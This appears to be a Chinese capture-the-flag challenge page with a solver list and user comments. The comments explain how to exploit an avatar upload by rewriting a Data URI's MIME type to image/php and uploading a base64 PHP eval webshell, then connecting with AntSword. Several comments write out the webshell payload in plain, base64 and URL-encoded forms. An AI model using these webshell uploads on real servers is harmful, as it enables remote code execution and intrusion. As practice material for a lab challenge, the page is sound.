评分(12)
解题动态
z231288 攻破了该题 19小时前
yehlg 攻破了该题 2天前
HuangYanQwQ 攻破了该题 4天前
dwx386572657 攻破了该题 5天前
GrantFly 攻破了该题 9天前
lvchijing 攻破了该题 12天前
xiaodixiaodi 攻破了该题 13天前
ukn 攻破了该题 13天前
k423 攻破了该题 14天前
baizhi白栀 攻破了该题 14天前
星落. 攻破了该题 15天前
怎么都吃不饱 攻破了该题 16天前
19834403913 攻破了该题 16天前
杰哥 攻破了该题 28天前
dacming9527 攻破了该题 28天前
ggtom 攻破了该题 29天前
Ahri 攻破了该题 29天前
wjzkifaa 攻破了该题 29天前
win11 攻破了该题 1月前
评论
阜阳朴昌范 1月前
举报
人在广东已经朴到失联~~~~ 先注册登录,再修改头像,上传头像的时候进行BP抓包,观察image字段,本题的突破点在于修改Data URI中的MIME类型和Base64数据,然后发包,send并拿到路径,然后蚂蚁宝剑连接,然后扫描flag文件即可
微笑刺客 2月前
举报
上传一张正常图片,提交时候BP截包,内容改为data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg==(base64后得结果),工具直连,拿flag
言寺介 5月前
举报
先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑
ixin 7月前
举报
image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d
zhuizhui 1年前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 1年前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 1年前
举报
用webacoo亦可解决
Zhumeng 1年前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 1年前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1年前
举报
一句话木马传参加''
LLTVLL 1年前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题